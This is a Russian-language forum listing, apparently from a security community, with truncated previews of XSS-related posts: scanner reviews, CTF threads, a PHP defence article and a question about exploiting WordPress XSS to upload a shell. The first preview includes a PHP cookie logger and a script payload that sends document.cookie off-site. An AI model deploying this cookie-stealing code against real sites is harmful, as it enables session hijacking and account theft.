xss

Нашел на одном сайте XSS, решил сделать куки стилер создал файл в него закинул такой код <?php $cookie = $_GET['cookie']; $log = fopen("xssed.txt","a"); fwrite($log, $cookie ."\n"); fclose($log); ?> Вставляю в уязвимый параметр: <ScRiPt>window.location = '' + document.cookie;</ScRiPt> На сайте...

Статья для участия в You must be registered for see element.на codeby Многие видели hackerone выложили курс по безопасности веба с видеоуроками как по мне уроки для совсем начинающих но к ним есть практические задания которые оказались очень даже интересными и тут я опишу некоторые решения...

You must be registered for see element. XsSCan - это инструмент python для поиска уязвимостей Cross Site Scripting на веб-сайтах. Этот инструмент является лучшим в своем роде. Вместо того, чтобы просто проверять одну страницу, как это делают большинство инструментов, этот инструмент...

Введение: почему XSS — это критично В 2024 году через XSS-уязвимости было скомпрометировано более 2 миллионов пользовательских аккаунтов. British Airways выплатили £20 млн штрафа за утечку данных через XSS. Если вы разрабатываете на PHP и не защищаетесь от XSS правильно — вы следующий. Эта...

You must be registered for see element. Не много тем про CTF, а ведь многие именно благодаря этим соревнованиям, начинают интересоваться ИБ и хакингом. Поэтому предлагаю, делится решениями нестандартных тасков, да и в общем продвигаться в этой области на форуме. В перспективе собрать команду...

You must be registered for see element. Всем привет! Сегодня будет небольшой обзор утилитки под названием V3n0M-Scanner. Самая стоящая функция сканера - поиск SQLi- и XSS-уязвимостей в на веб-сайтах с помощью дорков. А база дорков у V3n0M просто колоссальная: более 14 000 штук! Если буду...

You must be registered for see element. Приветствую Уважаемых Друзей,Форумчан и Дорогих гостей нашего форума. Сегодня обзор будет о инструменте-сканере xsstrike от замечательного автора UltimateHackers Сомневался по-поводу целесообразности обзора. Но т.к.сведения о сканере начали активно...

Здравствуйте! При сканировании сайта на WordPress, была выявлена версия 3.4.2, так-же две уязвимости XSS: WordPress Plupload Unspecified XSS, Cross-Site scripting XSS. Как использовать эти уязвимости для атаки на тестируемый ресурс? ( Проникновение, переправка URL, загрузка shell и тд. )

Доброго времени суток, друзья! Предлагаю создать здесь полезный и постоянно пополняемый список Android-утилит и приложений, которые мы, специалисты по кибербезопасности и энтузиасты, используем для тестирования на безопасность, анализа сетей и просто для повседневных задач. Для тех, кто...

Если вы профессиональный пентестер или опытный специалист по кибербезопасности, то наверняка уже знакомы с мощными инструментами, о которых пойдет речь. Изучать инструменты для хакинга и пентестинга всегда интересно и увлекательно, ведь они созданы гениальными программистами и максимально удобны...